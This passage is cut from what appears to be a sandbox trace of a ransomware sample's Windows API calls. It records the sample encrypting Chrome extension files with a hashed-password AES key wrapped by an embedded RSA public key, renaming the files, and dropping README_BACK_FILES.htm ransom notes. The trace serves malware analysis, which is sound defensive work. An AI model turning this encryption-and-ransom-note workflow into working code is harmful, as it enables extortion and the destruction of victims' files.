dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.667] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.667] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0248.668] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x293aae8) returned 1 [0248.670] CryptCreateHash (in: hProv=0x293aae8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0248.670] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.670] CryptHashData (hHash=0x29387f8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.670] CryptDeriveKey (in: hProv=0x293aae8, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x29389f8) returned 1 [0248.670] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.670] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0248.670] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x293c3e0) returned 1 [0248.671] CryptImportPublicKeyInfo (in: hCryptProv=0x293c3e0, dwCertEncodingType=0x1, pInfo=0x29311a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29311d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29311d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x29375b8) returned 1 [0248.671] CryptEncrypt (in: hKey=0x29375b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0248.671] CryptEncrypt (in: hKey=0x29375b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c468*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x293c468*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0248.671] WriteFile (in: hFile=0x5d50, lpBuffer=0x293c468*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x293c468*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0248.672] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.684] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.685] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.739] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.740] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.740] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.740] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.740] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.740] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.740] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.741] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.741] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.741] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.741] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.741] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.742] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.742] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.742] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.742] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.742] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.743] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0248.743] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0248.743] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x156, lpOverlapped=0x0) returned 1 [0248.743] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x156, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x160) returned 1 [0248.743] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x160, lpOverlapped=0x0) returned 1 [0248.743] CloseHandle (hObject=0x5d58) returned 1 [0248.743] CloseHandle (hObject=0x5d50) returned 1 [0248.743] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0248.748] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0248.749] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0248.750] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0248.751] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.751] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.751] CryptReleaseContext (hProv=0x293aae8, dwFlags=0x0) returned 1 [0248.752] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0248.752] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.752] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0248.752] AreFileApisANSI () returned 1 [0248.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0248.752] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.753] GetFileType (hFile=0x5d54) returned 0x1 [0248.753] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0248.754] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0248.754] FindClose (in: hFindFile=0x29385b8 | out: hFindFile=0x29385b8) returned 1 [0248.754] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\readme_back_files.htm")) returned 0xffffffff [0248.755] AreFileApisANSI () returned 1 [0248.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x291a308, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0248.755] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0248.755] GetFileType (hFile=0x5d4c) returned 0x1 [0248.755] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0248.757] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0248.757] FindClose (in: hFindFile=0x29384f8 | out: hFindFile=0x29384f8) returned 1 [0248.758] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\readme_back_files.htm")) returned 0xffffffff [0248.758] AreFileApisANSI () returned 1 [0248.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x291a308, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0248.758] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0248.759] GetFileType (hFile=0x5d40) returned 0x1 [0248.759] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0248.761] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0248.761] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x29384f8 [0248.761] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0248.761] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0248.761] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x29387b8 [0248.780] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.780] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.780] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0248.780] GetLastError () returned 0x0 [0248.780] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png")) returned 0x20 [0248.781] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png", dwFileAttributes=0x80) returned 1 [0248.782] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.782] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.783] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg", dwFileAttributes=0x2) returned 1 [0248.783] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293d898) returned 1 [0248.786] CryptCreateHash (in: hProv=0x293d898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0248.786] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.786] CryptHashData (hHash=0x2938978, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.786] CryptDeriveKey (in: hProv=0x293d898, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29385b8) returned 1 [0248.786] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, 